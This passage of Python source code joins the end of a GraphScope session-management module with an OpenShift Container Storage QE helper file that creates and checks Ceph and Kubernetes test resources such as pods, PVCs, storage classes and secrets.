- k8s_image_pull_secrets
- k8s_coordinator_cpu
- k8s_coordinator_mem
- k8s_vineyard_daemonset
- k8s_vineyard_cpu
- k8s_vineyard_mem
- k8s_engine_cpu
- k8s_engine_mem
- k8s_mars_worker_cpu
- k8s_mars_worker_mem
- k8s_mars_scheduler_cpu
- k8s_mars_scheduler_mem
- with_mars
- enable_gaia
- k8s_volumes
- k8s_waiting_for_delete
- engine_params
- initializing_interactive_engine
- timeout_seconds
Args:
key: str
Key of GraphScope config you want to get.
Raises:
ValueError: If no such option exists.
Returns: result: the value of the option
"""
if hasattr(gs_config, key):
return getattr(gs_config, key)
else:
raise ValueError("No such option {} exists.".format(key))
def default_session(session):
"""Python's :code:`with` handler for defining a default session.
This function provides a means of registering a session for handling
and code that need a default session calls.
The :code:`with` keyword to specify that code invocations within
the scope of a block should be executed by a particular session.
Args:
session: :class:`Session`
The session to be installed as the default session.
Returns:
A context manager for the default session.
"""
return _default_session_stack.get_controller(session)
def get_default_session():
"""Returns the default session for the current context.
Raises:
RuntimeError: Default session is not exist.
Returns:
The default :class:`Session`.
"""
return _default_session_stack.get_default()
def get_session_by_id(handle):
"""Return the session by handle."""
if handle not in _session_dict:
raise ValueError("Session {} not exists.".format(handle))
return _session_dict.get(handle)
class _DefaultSessionStack(object):
"""A stack of objects for providing implicit defaults."""
def __init__(self):
super().__init__()
self.stack = []
def get_default(self):
if not self.stack:
raise RuntimeError("No default session found.")
return self.stack[-1]
def reset(self):
self.stack = []
def is_cleared(self):
return not self.stack
@contextlib.contextmanager
def get_controller(self, default):
"""A context manager for manipulating a default stack."""
self.stack.append(default)
try:
yield default
finally:
# stack may be empty if reset() was called
if self.stack:
self.stack.remove(default)
_default_session_stack = _DefaultSessionStack() # pylint: disable=protected-access
def g(incoming_data=None, oid_type="int64", directed=True, generate_eid=True):
return get_default_session().g(incoming_data, oid_type, directed, generate_eid)
|
helpers.py | """
Helper functions file for OCS QE
"""
import logging
import re
import datetime
import statistics
import os
from subprocess import TimeoutExpired
import tempfile
import time
import yaml
import threading
from ocs_ci.ocs.ocp import OCP
from uuid import uuid4
from ocs_ci.ocs.exceptions import TimeoutExpiredError, UnexpectedBehaviour
from concurrent.futures import ThreadPoolExecutor
from ocs_ci.ocs import constants, defaults, ocp
from ocs_ci.utility import templating
from ocs_ci.ocs.resources import pod, pvc
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.exceptions import CommandFailed, ResourceWrongStatusException
from ocs_ci.utility.retry import retry
from ocs_ci.utility.utils import TimeoutSampler, run_cmd
from ocs_ci.framework import config
logger = logging.getLogger(__name__)
def create_unique_resource_name(resource_description, resource_type):
"""
Creates a unique object name by using the object_description,
object_type and a random uuid(in hex) as suffix
Args:
resource_description (str): The user provided object description
resource_type (str): The type of object for which the unique name
will be created. For example: project, pvc, etc
Returns:
str: A unique name
"""
return f"{resource_type}-{resource_description[:23]}-{uuid4().hex}"
def create_resource(do_reload=True, **kwargs):
"""
Create a resource
Args:
do_reload (bool): True for reloading the resource following its creation,
False otherwise
kwargs (dict): Dictionary of the OCS resource
Returns:
OCS: An OCS instance
Raises:
AssertionError: In case of any failure
"""
ocs_obj = OCS(**kwargs)
resource_name = kwargs.get('metadata').get('name')
created_resource = ocs_obj.create(do_reload=do_reload)
assert created_resource, (
f"Failed to create resource {resource_name}"
)
return ocs_obj
def wait_for_resource_state(resource, state, timeout=60):
"""
Wait for a resource to get to a given status
Args:
resource (OCS obj): The resource object
state (str): The status to wait for
timeout (int): Time in seconds to wait
Raises:
ResourceWrongStatusException: In case the resource hasn't
reached the desired state
"""
try:
resource.ocp.wait_for_resource(
condition=state, resource_name=resource.name, timeout=timeout
)
except TimeoutExpiredError:
logger.error(f"{resource.kind} {resource.name} failed to reach {state}")
resource.reload()
raise ResourceWrongStatusException(resource.name, resource.describe())
logger.info(f"{resource.kind} {resource.name} reached state {state}")
def create_pod(
interface_type=None, pvc_name=None,
do_reload=True, namespace=defaults.ROOK_CLUSTER_NAMESPACE,
node_name=None, pod_dict_path=None, sa_name=None, dc_deployment=False,
raw_block_pv=False, raw_block_device=constants.RAW_BLOCK_DEVICE, replica_count=1,
pod_name=None
):
"""
Create a pod
Args:
interface_type (str): The interface type (CephFS, RBD, etc.)
pvc_name (str): The PVC that should be attached to the newly created pod
do_reload (bool): True for reloading the object after creation, False otherwise
namespace (str): The namespace for the new resource creation
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod
sa_name (str): Serviceaccount name
dc_deployment (bool): True if creating pod as deploymentconfig
raw_block_pv (bool): True for creating raw block pv based pod, False otherwise
raw_block_device (str): raw block device for the pod
replica_count (int): Replica count for deployment config
pod_name (str): Name of the pod to create
Returns:
Pod: A Pod instance
Raises:
AssertionError: In case of any failure
"""
if interface_type == constants.CEPHBLOCKPOOL:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_RBD_POD_YAML
interface = constants.RBD_INTERFACE
else:
pod_dict = pod_dict_path if pod_dict_path else constants.CSI_CEPHFS_POD_YAML
interface = constants.CEPHFS_INTERFACE
if dc_deployment:
pod_dict = pod_dict_path if pod_dict_path else constants.FEDORA_DC_YAML
pod_data = templating.load_yaml(pod_dict)
if not pod_name:
pod_name = create_unique_resource_name(
f'test-{interface}', 'pod'
)
pod_data['metadata']['name'] = pod_name
pod_data['metadata']['namespace'] = namespace
if dc_deployment:
pod_data['metadata']['labels']['app'] = pod_name
pod_data['spec']['template']['metadata']['labels']['name'] = pod_name
pod_data['spec']['replicas'] = replica_count
if pvc_name:
if dc_deployment:
pod_data['spec']['template']['spec']['volumes'][0][
'persistentVolumeClaim'
]['claimName'] = pvc_name
else:
pod_data['spec']['volumes'][0]['persistentVolumeClaim']['claimName'] = pvc_name
if interface_type == constants.CEPHBLOCKPOOL and raw_block_pv:
pod_data['spec']['containers'][0]['volumeDevices'][0]['devicePath'] = raw_block_device
pod_data['spec']['containers'][0]['volumeDevices'][0]['name'] = pod_data.get('spec').get('volumes')[
0].get('name')
if node_name:
pod_data['spec']['nodeName'] = node_name
else:
if 'nodeName' in pod_data.get('spec'):
del pod_data['spec']['nodeName']
if sa_name and dc_deployment:
pod_data['spec']['template']['spec']['serviceAccountName'] = sa_name
if dc_deployment:
ocs_obj = create_resource(**pod_data)
logger.info(ocs_obj.name)
assert (ocp.OCP(kind='pod', namespace=namespace)).wait_for_resource(
condition=constants.STATUS_COMPLETED,
resource_name=pod_name + '-1-deploy',
resource_count=0, timeout=180, sleep=3
)
dpod_list = pod.get_all_pods(namespace=namespace)
for dpod in dpod_list:
if '-1-deploy' not in dpod.name:
if pod_name in dpod.name:
return dpod
else:
pod_obj = pod.Pod(**pod_data)
pod_name = pod_data.get('metadata').get('name')
logger.info(f'Creating new Pod {pod_name} for test')
created_resource = pod_obj.create(do_reload=do_reload)
assert created_resource, (
f"Failed to create Pod {pod_name}"
)
return pod_obj
def create_project():
"""
Create a project
Returns:
OCP: Project object
"""
namespace = create_unique_resource_name('test', 'namespace')
project_obj = ocp.OCP(kind='Project', namespace=namespace)
assert project_obj.new_project(namespace), f"Failed to create namespace {namespace}"
return project_obj
def create_multilpe_projects(number_of_project):
"""
Create one or more projects
Args:
number_of_project (int): Number of projects to be created
Returns:
list: List of project objects
"""
project_objs = [create_project() for _ in range(number_of_project)]
return project_objs
def create_secret(interface_type):
"""
Create a secret
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
Returns:
OCS: An OCS instance for the secret
"""
secret_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
secret_data = templating.load_yaml(
constants.CSI_RBD_SECRET_YAML
)
secret_data['stringData']['userID'] = constants.ADMIN_USER
secret_data['stringData']['userKey'] = get_admin_key()
interface = constants.RBD_INTERFACE
elif interface_type == constants.CEPHFILESYSTEM:
secret_data = templating.load_yaml(
constants.CSI_CEPHFS_SECRET_YAML
)
del secret_data['stringData']['userID']
del secret_data['stringData']['userKey']
secret_data['stringData']['adminID'] = constants.ADMIN_USER
secret_data['stringData']['adminKey'] = get_admin_key()
interface = constants.CEPHFS_INTERFACE
secret_data['metadata']['name'] = create_unique_resource_name(
f'test-{interface}', 'secret'
)
secret_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
return create_resource(**secret_data)
def create_ceph_block_pool(pool_name=None):
"""
Create a Ceph block pool
Args:
pool_name (str): The pool name to create
Returns:
OCS: An OCS instance for the Ceph block pool
"""
cbp_data = templating.load_yaml(constants.CEPHBLOCKPOOL_YAML)
cbp_data['metadata']['name'] = (
pool_name if pool_name else create_unique_resource_name(
'test', 'cbp'
)
)
cbp_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
cbp_data['spec']['failureDomain'] = get_failure_domin()
cbp_obj = create_resource(**cbp_data)
cbp_obj.reload()
assert verify_block_pool_exists(cbp_obj.name), (
f"Block pool {cbp_obj.name} does not exist"
)
return cbp_obj
def create_ceph_file_system(pool_name=None):
"""
Create a Ceph file system
Args:
pool_name (str): The pool name to create
Returns:
OCS: An OCS instance for the Ceph file system
"""
cfs_data = templating.load_yaml(constants.CEPHFILESYSTEM_YAML)
cfs_data['metadata']['name'] = (
pool_name if pool_name else create_unique_resource_name(
'test', 'cfs'
)
)
cfs_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
cfs_data = create_resource(**cfs_data)
cfs_data.reload()
assert validate_cephfilesystem(cfs_data.name), (
f"File system {cfs_data.name} does not exist"
)
return cfs_data
def create_storage_class(
interface_type, interface_name, secret_name,
reclaim_policy=constants.RECLAIM_POLICY_DELETE, sc_name=None,
provisioner=None
):
"""
Create a storage class
Args:
interface_type (str): The type of the interface
(e.g. CephBlockPool, CephFileSystem)
interface_name (str): The name of the interface
secret_name (str): The name of the secret
sc_name (str): The name of storage class to create
reclaim_policy (str): Type of reclaim policy. Defaults to 'Delete'
(eg., 'Delete', 'Retain')
Returns:
OCS: An OCS instance for the storage class
"""
sc_data = dict()
if interface_type == constants.CEPHBLOCKPOOL:
sc_data = templating.load_yaml(
constants.CSI_RBD_STORAGECLASS_YAML
)
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.RBD_INTERFACE
sc_data['provisioner'] = (
provisioner if provisioner else defaults.RBD_PROVISIONER
)
elif interface_type == constants.CEPHFILESYSTEM:
sc_data = templating.load_yaml(
constants.CSI_CEPHFS_STORAGECLASS_YAML
)
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/node-stage-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
interface = constants.CEPHFS_INTERFACE
sc_data['parameters']['fsName'] = get_cephfs_name()
sc_data['provisioner'] = (
provisioner if provisioner else defaults.CEPHFS_PROVISIONER
)
sc_data['parameters']['pool'] = interface_name
sc_data['metadata']['name'] = (
sc_name if sc_name else create_unique_resource_name(
f'test-{interface}', 'storageclass'
)
)
sc_data['metadata']['namespace'] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['parameters'][
'csi.storage.k8s.io/provisioner-secret-name'
] = secret_name
sc_data['parameters'][
'csi.storage.k8s.io/provisioner-secret-namespace'
] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['parameters']['clusterID'] = defaults.ROOK_CLUSTER_NAMESPACE
sc_data['reclaimPolicy'] = reclaim_policy
try:
del sc_data['parameters']['userid']
except KeyError:
pass
return create_resource(**sc_data)
def create_pvc(
sc_name, pvc_name=None, namespace=defaults.ROOK_CLUSTER_NAMESPACE,
size=None, do_reload=True, access_mode=constants.ACCESS_MODE_RWO,
volume_mode=None
):
"""
Create a PVC
Args:
sc_name (str): The name of the storage class for the PVC to be
associated with
pvc_name (str): The name of the PVC to create
namespace (str): The namespace for the PVC creation
size (str): Size of pvc to create
do_reload (bool): True for wait for reloading PVC after its creation, False otherwise
access_mode (str): The access mode to be used for the PVC
volume_mode (str): Volume mode for rbd RWX pvc i.e. 'Block'
Returns:
PVC: PVC instance
"""
pvc_data = templating.load_yaml(constants.CSI_PVC_YAML)
pvc_data['metadata']['name'] = (
pvc_name if pvc_name else create_unique_resource_name(
'test', 'pvc'
)
)
pvc_data['metadata']['namespace'] = namespace
pvc_data['spec']['accessModes'] = [access_mode]
pvc_data['spec']['storageClassName'] = sc_name
if size:
pvc_data['spec']['resources']['requests']['storage'] = size
if volume_mode:
pvc_data['spec']['volumeMode'] = volume_mode
ocs_obj = pvc.PVC(**pvc_data)
created_pvc = ocs_obj.create(do_reload=do_reload)
assert created_pvc, f"Failed to create resource {pvc_name}"
return ocs_obj
def create_multiple_pvcs(
sc_name, namespace, number_of_pvc=1, size=None, do_reload=False,
access_mode=constants.ACCESS_MODE_RWO
):
"""
Create one or more PVC
Args:
sc_name (str): The name of the storage class to provision the PVCs from
namespace (str): The namespace for the PVCs creation
number_of_pvc (int): Number of PVCs to be created
size (str): The size of the PVCs to create
do_reload (bool): True for wait for reloading PVC after its creation,
False otherwise
access_mode (str): The kind of access mode for PVC
Returns:
list: List of PVC objects
"""
if access_mode == 'ReadWriteMany' and 'rbd' in sc_name:
volume_mode = 'Block'
else:
volume_mode = None
return [
create_pvc(
sc_name=sc_name, size=size, namespace=namespace,
do_reload=do_reload, access_mode=access_mode, volume_mode=volume_mode
) for _ in range(number_of_pvc)
]
def verify_block_pool_exists(pool_name):
"""
Verify if a Ceph block pool exist
Args:
pool_name (str): The name of the Ceph block pool
Returns:
bool: True if the Ceph block pool exists, False otherwise
"""
logger.info(f"Verifying that block pool {pool_name} exists")
ct_pod = pod.get_ceph_tools_pod()
try:
for pools in TimeoutSampler(
60, 3, ct_pod.exec_ceph_cmd, 'ceph osd lspools'
):
logger.info(f'POOLS are {pools}')
for pool in pools:
if pool_name in pool.get('poolname'):
return True
except TimeoutExpiredError:
return False
def get_admin_key():
"""
Fetches admin key secret from Ceph
Returns:
str: The admin key
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd('ceph auth get-key client.admin')
return out['key']
def get_cephfs_data_pool_name():
"""
Fetches ceph fs datapool name from Ceph
Returns:
str: fs datapool name
"""
ct_pod = pod.get_ceph_tools_pod()
out = ct_pod.exec_ceph_cmd('ceph fs ls')
return out[0]['data_pools'][0]
def validate_cephfilesystem(fs_name):
"""
Verify CephFileSystem exists at Ceph and OCP
Args:
fs_name (str): The name of the Ceph FileSystem
Returns:
bool: True if CephFileSystem is created at Ceph and OCP side else
will return False with valid msg i.e Failure cause
"""
cfs = ocp.OCP(
kind=constants.CEPHFILESYSTEM,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
ct_pod = pod.get_ceph_tools_pod()
ceph_validate = False
ocp_validate = False
result = cfs.get(resource_name=fs_name)
if result.get('metadata').get('name'):
logger.info("Filesystem %s got created from Openshift Side", fs_name)
ocp_validate = True
else:
logger.info(
"Filesystem %s was not create at Openshift Side", fs_name
)
return False
try:
for pools in TimeoutSampler(
60, 3, ct_pod.exec_ceph_cmd, 'ceph fs ls'
):
for out in pools:
result = out.get('name')
if result == fs_name:
logger.info("FileSystem %s got created from Ceph Side", fs_name)
ceph_validate = True
break
else:
logger.error("FileSystem %s was not present at Ceph Side", fs_name)
ceph_validate = False
if ceph_validate:
break
except TimeoutExpiredError:
pass
return True if (ceph_validate and ocp_validate) else False
def get_all_storageclass_names():
"""
Function for getting all storageclass
Returns:
list: list of storageclass name
"""
sc_obj = ocp.OCP(
kind=constants.STORAGECLASS,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = sc_obj.get()
sample = result['items']
storageclass = [
item.get('metadata').get('name') for item in sample if (
(item.get('metadata').get('name') not in constants.IGNORE_SC_GP2)
and (item.get('metadata').get('name') not in constants.IGNORE_SC_FLEX)
)
]
return storageclass
def delete_storageclasses(sc_objs):
""""
Function for Deleting storageclasses
Args:
sc_objs (list): List of SC objects for deletion
Returns:
bool: True if deletion is successful
"""
for sc in sc_objs:
logger.info("Deleting StorageClass with name %s", sc.name)
sc.delete()
return True
def get_cephblockpool_names():
"""
Function for getting all CephBlockPool
Returns:
list: list of cephblockpool name
"""
pool_obj = ocp.OCP(
kind=constants.CEPHBLOCKPOOL,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = pool_obj.get()
sample = result['items']
pool_list = [
item.get('metadata').get('name') for item in sample
]
return pool_list
def delete_cephblockpools(cbp_objs):
"""
Function for deleting CephBlockPool
Args:
cbp_objs (list): List of CBP objects for deletion
Returns:
bool: True if deletion of CephBlockPool is successful
"""
for cbp in cbp_objs:
logger.info("Deleting CephBlockPool with name %s", cbp.name)
cbp.delete()
return True
def get_cephfs_name():
"""
Function to retrive CephFS name
Returns:
str: Name of CFS
"""
cfs_obj = ocp.OCP(
kind=constants.CEPHFILESYSTEM,
namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
result = cfs_obj.get()
return result['items'][0].get('metadata').get('name')
def run_io_with_rados_bench(**kw):
""" A task for radosbench
Runs radosbench command on specified pod . If parameters are
not provided task assumes few default parameters.This task
runs command in synchronous fashion.
Args:
**kw: Needs a dictionary of various radosbench parameters.
ex: pool_name:pool
pg_num:number of pgs for pool
op: type of operation {read, write}
cleanup: True OR False
Returns:
ret: return value of radosbench command
"""
logger.info("Running radosbench task")
ceph_pods = kw.get('ceph_pods') # list of pod objects of ceph cluster
config = kw.get('config')
role = config.get('role', 'client')
clients = [cpod for cpod in ceph_pods if role in cpod.roles]
idx = config.get('idx', 0)
client = clients[idx]
op = config.get('op', 'write')
cleanup = ['--no-cleanup', '--cleanup'][config.get('cleanup', True)]
pool = config.get('pool')
block = str(config.get('size', 4 << 20))
time = config.get('time', 120)
time = str(time)
rados_bench = (
f"rados --no-log-to-stderr "
f"-b {block} "
f"-p {pool} "
f"bench "
f"{time} "
f"{op} "
f"{cleanup} "
)
try:
ret = client.exec_ceph_cmd(ceph_cmd=rados_bench)
except CommandFailed as ex:
logger.error(f"Rados bench failed\n Error is: {ex}")
return False
logger.info(ret)
logger.info("Finished radosbench")
return ret
def get_all_pvs():
"""
Gets all pv in openshift-storage namespace
Returns:
dict: Dict of all pv in openshift-storage namespace
"""
ocp_pv_obj = ocp.OCP(
kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
return ocp_pv_obj.get()
# TODO: revert counts of tries and delay,BZ 1726266
@retry(AssertionError, tries=20, delay=10, backoff=1)
def validate_pv_delete(pv_name):
"""
validates if pv is deleted after pvc deletion
Args:
pv_name (str): pv from pvc to validates
Returns:
bool: True if deletion is successful
Raises:
AssertionError: If pv is not deleted
"""
ocp_pv_obj = ocp.OCP(
kind=constants.PV, namespace=defaults.ROOK_CLUSTER_NAMESPACE
)
try:
if ocp_pv_obj.get(resource_name=pv_name):
msg = f"{constants.PV} {pv_name} is not deleted after PVC deletion"
raise AssertionError(msg)
except CommandFailed:
return True
def create_pods(pvc_objs_list, interface_type=None, namespace=None):
"""
Create Pods.
A pod will be created for each PVC in 'pvc_objs_list'.
Args:
pvc_objs_list (list): List of PVC objects
interface_type (str): The interface type (CephFS, Cephblockpool, etc.)
namespace(str): Name of the namespace
Returns:
list: List of Pod objects
"""
pod_objs = [
create_pod(
interface_type=interface_type, pvc_name=pvc_obj.name,
do_reload=False, namespace=namespace
) for pvc_obj in pvc_objs_list
]
return pod_objs
def get_worker_nodes():
"""
Fetches all worker nodes.
Returns:
list: List of names of worker nodes
"""
label = 'node-role.kubernetes.io/worker'
ocp_node_obj = ocp.OCP(kind=constants.NODE)
nodes = ocp_node_obj.get(selector=label).get('items')
worker_nodes_list = [node.get('metadata').get('name') for node in nodes]
return worker_nodes_list
def get_master_nodes():
"""
Fetches all master nodes.
Returns:
list: List of names of master nodes
"""
label = 'node-role.kubernetes.io/master'
ocp_node_obj = ocp.OCP(kind=constants.NODE)
nodes = ocp_node_obj.get(selector=label).get('items')
master_nodes_list = [node.get('metadata').get('name') for node in nodes]
return master_nodes_list
def get_start_creation_time(interface, pvc_name):
"""
Get the starting creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: Start time of PVC creation
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
if interface == constants.CEPHBLOCKPOOL:
pod_name = pod.get_rbd_provisioner_pod().name
else:
pod_name = pod.get_cephfs_provisioner_pod().name
# get the logs from the csi-provisioner container
logs = pod.get_pod_logs(pod_name, 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
start = [
i for i in logs if re.search(f"provision.*{pvc_name}.*started", i)
]
start = start[0].split(' ')[1]
return datetime.datetime.strptime(start, format)
def get_end_creation_time(interface, pvc_name):
"""
Get the ending creation time of a PVC based on provisioner logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
datetime object: End time of PVC creation
"""
format = '%H:%M:%S.%f'
# Get the correct provisioner pod based on the interface
if interface == constants.CEPHBLOCKPOOL:
pod_name = pod.get_rbd_provisioner_pod().name
else:
pod_name = pod.get_cephfs_provisioner_pod().name
# get the logs from the csi-provisioner container
logs = pod.get_pod_logs(pod_name, 'csi-provisioner')
logs = logs.split("\n")
# Extract the starting time for the PVC provisioning
end = [
i for i in logs if re.search(f"provision.*{pvc_name}.*succeeded", i)
]
end = end[0].split(' ')[1]
return datetime.datetime.strptime(end, format)
def measure_pvc_creation_time(interface, pvc_name):
"""
Measure PVC creation time based on logs
Args:
interface (str): The interface backed the PVC
pvc_name (str): Name of the PVC for creation time measurement
Returns:
float: Creation time for the PVC
"""
start = get_start_creation_time(interface=interface, pvc_name=pvc_name)
end = get_end_creation_time(interface=interface, pvc_name=pvc_name)
total = end - start
return total.total_seconds()
def get_default_storage_class():
"""
Get the default StorageClass(es)
Returns:
list: default StorageClass(es) list
"""
default_sc_obj = ocp.OCP(kind='StorageClass')
storage_classes = default_sc_obj.get().get('items')
storage_classes = [
sc for sc in storage_classes if 'annotations' in sc.get('metadata')
]
return [
sc.get('metadata').get('name') for sc in storage_classes if sc.get(
'metadata'
).get('annotations').get(
'storageclass.kubernetes.io/is-default-class'
) == 'true'
]
def change_default_storageclass(scname):
"""
Change the default StorageClass to the given SC name
Args:
scname (str): StorageClass name
Returns:
bool: True on success
"""
default_sc = get_default_storage_class()
ocp_obj = ocp.OCP(kind='StorageClass')
if default_sc:
# Change the existing default Storageclass annotation to false
patch = " '{\"metadata\": {\"annotations\":" \
"{\"storageclass.kubernetes.io/is-default-class\"" \
":\"false\"}}}' "
patch_cmd = f"patch storageclass {default_sc} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
# Change the new storageclass to default
patch = " '{\"metadata\": {\"annotations\":" \
"{\"storageclass.kubernetes.io/is-default-class\"" \
":\"true\"}}}' "
patch_cmd = f"patch storageclass {scname} -p" + patch
ocp_obj.exec_oc_cmd(command=patch_cmd)
return True
def verify_volume_deleted_in_backend(interface, image_uuid, pool_name=None):
"""
Verify that Image/Subvolume is not present in the backend.
Args:
interface (str): The interface backed the PVC
image_uuid (str): Part of VolID which represents
corresponding image/subvolume in backend
eg: oc get pv/<volumeName> -o jsonpath='{.spec.csi.volumeHandle}'
Output is the CSI generated VolID and looks like:
'0001-000c-rook-cluster-0000000000000001-
f301898c-a192-11e9-852a-1eeeb6975c91' where
image_uuid is 'f301898c-a192-11e9-852a-1eeeb6975c91'
pool_name (str): Name of the rbd-pool if interface is CephBlockPool
Returns:
bool: True if volume is not present. False if volume is present
"""
ct_pod = pod.get_ceph_tools_pod()
if interface == constants.CEPHBLOCKPOOL:
valid_error = f"error opening image csi-vol-{image_uuid}"
cmd = f"rbd info -p {pool_name} csi-vol-{image_uuid}"
if interface == constants.CEPHFILESYSTEM:
valid_error = f"Subvolume 'csi-vol-{image_uuid}' not found"
cmd = (
f"ceph fs subvolume getpath {defaults.CEPHFILESYSTEM_NAME}"
f" csi-vol-{image_uuid} csi"
)
try:
ct_pod.exec_ceph_cmd(ceph_cmd=cmd, format='json')
return False
except CommandFailed as ecf:
assert valid_error in str(ecf), (
f"Error occurred while verifying volume is deleted in backend: "
f"{str(ecf)} ImageUUID: {image_uuid}. Interface type: {interface}"
)
logger.info(
f"Verified: Volume corresponding to uuid {image_uuid} is deleted "
f"in backend"
)
return True
def create_serviceaccount(namespace):
"""
Create a Serviceaccount
Args:
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
service_account_data = templating.load_yaml(
constants.SERVICE_ACCOUNT_YAML
)
service_account_data['metadata']['name'] = create_unique_resource_name(
'sa', 'serviceaccount'
)
service_account_data['metadata']['namespace'] = namespace
return create_resource(**service_account_data)
def get_serviceaccount_obj(sa_name, namespace):
"""
Get serviceaccount obj
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
OCS: An OCS instance for the service_account
"""
ocp_sa_obj = ocp.OCP(kind=constants.SERVICE_ACCOUNT, namespace=namespace)
try:
sa_dict = ocp_sa_obj.get(resource_name=sa_name)
return OCS(**sa_dict)
except CommandFailed:
logger.error("ServiceAccount not found in specified namespace")
def validate_scc_policy(sa_name, namespace):
"""
Validate serviceaccount is added to scc of privileged
Args:
sa_name (str): Service Account name
namespace (str): The namespace for the serviceaccount creation
Returns:
bool: True if sc_name is present in scc of privileged else False
"""
sa_name = f"system:serviceaccount:{namespace}:{sa_name}"
logger.info(sa_name)
ocp_scc_obj = ocp.OCP(kind=constants.SCC, namespace=namespace)
scc_dict = ocp_scc_obj.get(resource_name=constants.PRIVILEGED)
scc_users_list = scc_dict.get('users')
for scc_user in scc_users_list:
if scc_user == sa_name:
return True
return False
def add_scc_policy(sa_name, namespace):
"""
Adding ServiceAccount to scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy creation
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy add-scc-to-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False
)
logger.info(out)
def remove_scc_policy(sa_name, namespace):
"""
Removing ServiceAccount from scc privileged
Args:
sa_name (str): ServiceAccount name
namespace (str): The namespace for the scc_policy deletion
"""
ocp = OCP()
out = ocp.exec_oc_cmd(
command=f"adm policy remove-scc-from-user privileged system:serviceaccount:{namespace}:{sa_name}",
out_yaml_format=False
)
logger.info(out)
def delete_deploymentconfig(pod_obj):
"""
Delete deploymentconfig
Args:
pod_obj (object): Pod object
"""
dc_ocp_obj = ocp.OCP(kind=constants.DEPLOYMENTCONFIG)
dc_ocp_obj.delete(resource_name=pod_obj.get_labels().get('name'))
dc_ocp_obj.wait_for_delete(resource_name=pod_obj.get_labels().get('name'))
def craft_s3_command(mcg_obj, cmd):
"""
Crafts the AWS CLI S3 command including the
login credentials and command to be ran
Args:
mcg_obj: An MCG object containing the MCG S3 connection credentials
cmd: The AWSCLI command to run
Returns:
str: The crafted command, ready to be executed on the pod
"""
if mcg_obj:
base_command = (
f"sh -c \"AWS_ACCESS_KEY_ID={mcg_obj.access_key_id} "
f"AWS_SECRET_ACCESS_KEY={mcg_obj.access_key} "
f"AWS_DEFAULT_REGION={mcg_obj.region} "
f"aws s3 "
f"--endpoint={mcg_obj.s3_endpoint} "
f"--no-verify-ssl "
)
string_wrapper = "\""
else:
base_command = (
f"aws s3 --no-verify-ssl --no-sign-request "
)
string_wrapper = ''
return f"{base_command}{cmd}{string_wrapper}"
def wait_for_resource_count_change(
func_to_use, previous_num, namespace, change_type='increase',
min_difference=1, timeout=20, interval=2, **func_kwargs
):
"""
Wait for a change in total count of PVC or pod
Args:
func_to_use (function): Function to be used to fetch resource info
Supported functions: pod.get_all_pvcs(), pod.get_all_pods()
previous_num (int): Previous number of pods/PVCs for comparison
namespace (str): Name of the namespace
change_type (str): Type of change to check. Accepted values are
'increase' and 'decrease'. Default is 'increase'.
min_difference (int): Minimum required difference in PVC/pod count
timeout (int): Maximum wait time in seconds
interval (int): Time in seconds to wait between consecutive checks
Returns:
True if difference in count is greater than or equal to
'min_difference'. False in case of timeout.
"""
try:
for sample in TimeoutSampler(
timeout, interval, func_to_use, namespace, **func_kwargs
):
if func_to_use == pod.get_all_pods:
current_num = len(sample)
else:
current_num = len(sample['items'])
if change_type == 'increase':
count_diff = current_num - previous_num
else:
count_diff = previous_num - current_num
if count_diff >= min_difference:
return True
except TimeoutExpiredError:
return False
def verify_pv_mounted_on_node(node_pv_dict):
"""
Check if mount point of a PV exists on a node
Args:
node_pv_dict (dict): Node to PV list mapping
eg: {'node1': ['pv1', 'pv2', 'pv3'], 'node2': ['pv4', 'pv5']}
Returns:
dict: Node to existing PV list mapping
eg: {'node1': ['pv1', 'pv3'], 'node2': ['pv5']}
"""
existing_pvs = {}
for node, pvs in node_pv_dict.items():
cmd = f'oc debug nodes/{node} -- df'
df_on_node = run_cmd(cmd)
existing_pvs[node] = []
for pv_name in pvs:
if f"/pv/{pv_name}/" in df_on_node:
existing_pvs[node].append(pv_name)
return existing_pvs
def converge_lists(list_to_converge):
"""
Function to flatten and remove the sublist created during future obj
Args:
list_to_converge (list): arg list of lists, eg: [[1,2],[3,4]]
Returns:
list (list): return converged list eg: [1,2,3,4]
"""
return [item for sublist in list_to_converge for item in sublist]
def create_multiple_pvc_parallel(
sc_obj, namespace, number_of_pvc, size, access_modes
):
"""
Funtion to create multiple PVC in parallel using threads
Function will create PVCs based on the available access modes
Args:
sc_obj (str): Storage Class object
namespace (str): The namespace for creating pvc
number_of_pvc (int): NUmber of pvc to be created
